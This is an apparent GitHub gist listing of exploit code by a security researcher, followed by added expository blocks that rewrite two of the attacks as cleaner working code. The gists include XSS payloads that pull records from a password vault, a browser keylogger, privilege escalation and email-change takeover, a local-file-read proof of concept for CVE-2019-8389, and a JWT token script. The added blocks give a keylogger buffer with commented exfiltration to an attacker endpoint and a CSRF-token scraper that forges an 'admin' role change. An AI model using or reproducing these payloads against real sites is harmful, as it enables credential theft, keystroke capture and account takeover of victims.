Shawar Khan shawarkhanethicalhacker

shawarkhanethicalhacker / password_vault_exploit.js
Created Aug 20, 2018
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the raw response body (all records) as a string
var allrecords = data;
// converting response to JSON
shawarkhanethicalhacker / exptest.js
// Keystroke capture: every typed character is appended to `keys`
var keys = '';
document.onkeypress = function(e) {
// old IE exposes the event as window.event; other browsers pass it as the argument
var get = window.event ? event : e;
// keyCode on older browsers, charCode on the rest
var key = get.keyCode ? get.keyCode : get.charCode;
key = String.fromCharCode(key);
keys += key;
}
// timer that flushes the captured buffer
window.setInterval(function(){
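The capture half of the keylogger above, rewritten as an added example (not code from the gist) so it can be exercised outside a browser. The event objects are constructed to mimic `KeyboardEvent`; the `keypress` handler, `keyCode`/`charCode` fallback and the buffer-and-flush loop mirror the gist, while the modern `key` property is preferred because `keypress` and `keyCode` are deprecated. No exfiltration endpoint is assumed; the browser wiring is shown in comments only.

```javascript
// Added example: keystroke normalisation and buffering for a keylogger payload.
// Not part of the original gist; events below are constructed for the example.

// Turn a key event into the text the victim typed. Uses the modern `key`
// property when present, otherwise the legacy keyCode/charCode path from the
// gist (only meaningful for `keypress`, where the code is a character code).
function keyToText(e) {
  if (typeof e.key === 'string') {
    if (e.key.length === 1) return e.key;   // printable character, shift already applied
    if (e.key === 'Enter') return '\n';
    if (e.key === 'Tab') return '\t';
    if (e.key === 'Backspace') return '\b';
    return '';                              // Shift, Control, ArrowLeft, ... carry no text
  }
  const code = e.keyCode ? e.keyCode : e.charCode;
  return code ? String.fromCharCode(code) : '';
}

// Accumulates keystrokes and hands them out in chunks, which is what the
// gist's setInterval loop does before sending the buffer off.
class KeyBuffer {
  constructor() { this.keys = ''; }
  push(e) { this.keys += keyToText(e); }
  drain() { const out = this.keys; this.keys = ''; return out; }
}

// Browser wiring (not executed here; EXFIL_URL is an assumed attacker endpoint):
//   const buf = new KeyBuffer();
//   document.addEventListener('keydown', (e) => buf.push(e), true);
//   setInterval(() => {
//     const chunk = buf.drain();
//     if (chunk) navigator.sendBeacon(EXFIL_URL, chunk);
//   }, 3000);

// Constructed sample input: the victim types "pW", presses Enter, then a
// legacy keypress event for "d" arrives from a browser without `key`.
const SAMPLE_EVENTS = [
  { key: 'p' }, { key: 'Shift' }, { key: 'W' }, { key: 'Enter' },
  { keyCode: 0, charCode: 100 },
];

function captureSample() {
  const buf = new KeyBuffer();
  SAMPLE_EVENTS.forEach((e) => buf.push(e));
  return buf.drain();
}
```

Registering on `keydown` with the capture flag (third argument `true`) sees the key before the page's own handlers can stop propagation; `keypress`, as in the gist, misses non-printable keys and is no longer fired by all browsers.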
shawarkhanethicalhacker / XSS_Privilege_Escalation.js
Created Aug 4, 2019
Privilege escalation exploit code for an XSS vulnerability that I recently discovered.
// XSS Exploit code for Privilege Escalation
// Author: Shawar Khan
// scratch element used to parse the fetched settings page
var woot = document.createElement('html');
// fetch the victim's own settings page with their session cookies attached
fetch('https://vulnerablesite.com/settings',{credentials: 'include'}).then((resp) => resp.text()).then(function(data){
woot.innerHTML=data;
// the CSRF token is read from the fourth <meta> tag of the settings page
var csrf_token = woot.getElementsByTagName('meta')[3]['content'];
privilege_escalate();
shawarkhanethicalhacker / Musicloud-exploit.py
Last active Feb 17, 2019
[CVE-2019-8389] Exploit code for a local file read vulnerability in the Musicloud v1.6 iOS application
#!/usr/bin/python
# Proof of concept for CVE-2019-8389
# Exploit author: Shawar Khan
import sys
import requests
def usage():
print "Usage:\n\tpython musicloud_lfi.py 192.168.8.103 /etc/passwd\n"
shawarkhanethicalhacker / token.py
Last active Jan 28, 2019
A little automation for obtaining a JWT token for a POC
# A sample code that obtains a permanent JWT token when provided a temporary JWT token
import json
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# suppress urllib3's warning about unverified HTTPS requests
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
jwt_token=raw_input("Enter token > ")  # the temporary token
# token endpoint that hands back the permanent token
exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token"
# headers replayed from the browser; the temporary token is sent as a Bearer token
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "close"}
shawarkhanethicalhacker / email_change_exploit_xss.js
Created Sep 14, 2018
This is a sample exploit for an XSS vulnerability that changes the user's email. It bypasses some CSRF protections, as the page revoked its CSRF protection when refreshed.
// a Simple XSS exploit for email change
// Shawar Khan
// open the settings page in a new window; the XSS runs on target.com, so it is same-origin and its DOM is scriptable
var dark_window = window.open('https://www.target.com/settings');
dark_window.addEventListener('load',
function exploit_run(){
dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // third control of the first form: the email field
dark_window.document.body.getElementsByTagName('form')[0][40].click() // the submit button, selected by position
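Both the privilege-escalation gist and the email-change gist above follow one pattern: from the XSS context, read the victim's own settings page, lift whatever the server uses as its CSRF token, and submit the form back with changed values. The following added example (not code from either gist) implements that pattern in Node so it can be run and tested offline: it parses a constructed settings page for the `csrf-token` meta tag by name rather than by position (`[3]` breaks as soon as a meta tag is added) and for the form's own fields by name rather than by index (`[2]`, `[40]`), then builds the forged request. The settings HTML, the field names, the meta tag name and the target URL are all assumptions; `buildExploitRequest` returns `null` instead of firing when the page does not look as expected.

```javascript
// Added example: scrape a settings page for its CSRF token and form fields,
// then build the same-origin state-changing request an XSS payload would send.
// Everything below is constructed for the example; none of it is the gists' code.

const SETTINGS_HTML = `
<html><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<meta name="csrf-param" content="authenticity_token">
<meta name="csrf-token" content="c0nstructedT0ken==">
</head><body>
<form action="/settings" method="post">
  <input type="hidden" name="authenticity_token" value="c0nstructedT0ken==">
  <input type="text" name="username" value="victim">
  <input type="email" name="email" value="victim@example.com">
  <input type="hidden" name="role" value="user">
  <input type="submit" name="commit" value="Save">
</form>
</body></html>`;

const attr = (tag, name) =>
  (new RegExp('\\b' + name + '\\s*=\\s*["\']([^"\']*)["\']', 'i').exec(tag) || [])[1];

// Value of <meta name="..." content="..."> regardless of attribute order or position.
function metaContent(html, name) {
  const metaRe = /<meta\b[^>]*>/gi;
  let m;
  while ((m = metaRe.exec(html)) !== null) {
    if (attr(m[0], 'name') === name) return attr(m[0], 'content') ?? null;
  }
  return null;
}

// name/value pairs of the <input>s in the first <form>, as a browser would submit them.
function formFields(html) {
  const form = /<form\b[^>]*>([\s\S]*?)<\/form>/i.exec(html);
  if (!form) return null;
  const fields = {};
  const inputRe = /<input\b[^>]*>/gi;
  let m;
  while ((m = inputRe.exec(form[1])) !== null) {
    const n = attr(m[0], 'name');
    if (n !== undefined) fields[n] = attr(m[0], 'value') ?? '';
  }
  return fields;
}

// Forge the request: victim's own values plus attacker overrides, the page's
// CSRF token both in the body (hidden field) and in the header, cookies attached.
function buildExploitRequest(html, action, overrides) {
  const token = metaContent(html, 'csrf-token');
  const fields = formFields(html);
  if (token === null || fields === null) return null; // layout changed: do not fire blindly
  const body = new URLSearchParams({ ...fields, ...overrides });
  return {
    url: action,
    options: {
      method: 'POST',
      credentials: 'include',
      headers: {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-CSRF-Token': token,
      },
      body: body.toString(),
    },
  };
}

// In the XSS payload on the vulnerable origin (assumed URL; not run here):
//   fetch('https://vulnerablesite.com/settings', { credentials: 'include' })
//     .then((r) => r.text())
//     .then((html) => {
//       const req = buildExploitRequest(html, 'https://vulnerablesite.com/settings',
//                                       { email: 'attacker@attacker.com', role: 'admin' });
//       if (req) return fetch(req.url, req.options);
//     });
```

Because the request is issued from the target origin with `credentials: 'include'`, neither SameSite cookies nor a synchronizer token stop it: the token is readable from the victim's own page. That is why an XSS turns every CSRF-protected action into an attacker-controlled one, and why the only real fix is the XSS itself.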